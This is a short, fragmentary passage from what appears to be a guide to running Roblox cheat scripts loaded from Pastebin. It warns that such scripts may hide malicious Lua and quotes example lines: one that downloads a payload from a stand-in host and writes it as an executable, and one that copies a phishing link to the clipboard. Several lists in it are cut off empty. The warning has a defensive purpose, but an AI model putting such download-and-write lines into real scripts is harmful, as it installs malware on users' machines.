After execution, a window will appear. Common tabs:

Note: Some options may crash the game. Use one feature at a time.


A typical script URL looks like this:

https://pastebin.com/raw/7XkLm9Qf

Pastebin scripts can include malicious Lua code that:

Always check the script for suspicious lines like:

writefile("virus.exe", game:HttpGet("http://bad-site.com/payload"))

or

setclipboard("http://phishing.com")